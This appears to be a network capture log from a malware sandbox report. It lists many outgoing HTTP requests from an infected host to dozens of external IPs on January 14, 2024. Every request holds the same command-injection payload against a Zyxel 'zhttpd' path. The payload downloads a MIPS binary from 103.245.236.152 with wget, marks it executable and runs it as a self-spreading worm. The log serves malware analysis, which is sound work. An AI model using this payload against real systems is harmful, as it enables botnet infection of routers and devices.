                                            Jan 14, 2024 15:50:39.417735100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4395192.168.2.2339298122.35.112.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417783022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4396192.168.2.2341194167.163.19.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417803049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4397192.168.2.234975842.66.181.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417850971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4398192.168.2.2333270168.93.137.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417907000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4399192.168.2.23360924.143.51.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.419399977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4400192.168.2.2338924128.16.48.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.419456959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4401192.168.2.2356338114.13.174.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.419477940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4402192.168.2.235292299.136.48.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.419501066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4403192.168.2.2336096147.44.174.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.419549942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4404192.168.2.2339874133.63.32.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.419575930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4405192.168.2.2343628206.15.46.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.419603109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4406192.168.2.2355614100.143.165.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421524048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4407192.168.2.234738840.65.77.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421541929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4408192.168.2.2336570218.178.93.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421617985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4409192.168.2.23526422.206.60.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421621084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4410192.168.2.2334312175.48.155.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421643019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4411192.168.2.2344904205.57.3.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421669006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4412192.168.2.235099097.179.28.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421684980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4413192.168.2.233481470.150.128.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421730042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4414192.168.2.2360824108.19.121.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421752930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4415192.168.2.2338470114.172.84.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421777010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4416192.168.2.235565091.239.247.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421809912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4417192.168.2.234539068.96.60.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421818972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4418192.168.2.23536725.19.176.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421855927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4419192.168.2.234758024.25.228.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421869993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4420192.168.2.234081614.199.118.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421883106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4421192.168.2.2344778143.54.249.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421947002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4422192.168.2.234832062.173.168.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421958923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4423192.168.2.2338792197.243.43.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.421997070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4424192.168.2.2340466197.96.247.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422022104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4425192.168.2.2341020197.223.69.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422044992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4426192.168.2.2342626219.150.35.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422079086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4427192.168.2.2350772167.77.39.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422110081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4428192.168.2.2347076107.64.227.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422151089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4429192.168.2.233545890.166.206.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422169924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4430192.168.2.235102093.30.140.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422199965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4431192.168.2.234953635.177.229.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422255993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4432192.168.2.233427042.48.4.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422292948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4433192.168.2.234087686.90.224.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422313929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4434192.168.2.2352370116.218.146.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422337055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4435192.168.2.2347608166.208.85.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422378063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4436192.168.2.2335602154.161.182.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422419071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4437192.168.2.2342744178.111.28.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422441006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4438192.168.2.2339254134.73.147.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422466993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4439192.168.2.2336070114.101.137.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422514915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4440192.168.2.2334068121.103.140.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422547102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4441192.168.2.2353360145.179.79.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422570944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4442192.168.2.2351616166.247.191.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422596931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4443192.168.2.2341024115.71.197.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422614098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4444192.168.2.2356944201.75.210.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422631025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4445192.168.2.234657414.157.29.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422638893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4446192.168.2.2336878142.31.73.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422653913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4447192.168.2.234423870.13.68.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422682047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4448192.168.2.2342938129.27.135.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422699928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4449192.168.2.2342660137.32.18.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422863007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4450192.168.2.2335182149.235.82.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422883034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4451192.168.2.2353954186.249.145.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422894955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4452192.168.2.2356368143.25.235.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422914028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4453192.168.2.234371087.29.159.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422938108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4454192.168.2.2351080160.229.106.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.422975063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4455192.168.2.2349084165.175.89.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423010111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4456192.168.2.2351654187.131.160.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423041105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4457192.168.2.233717673.193.111.60443
                                            TimestampBytes transferredDirectionData
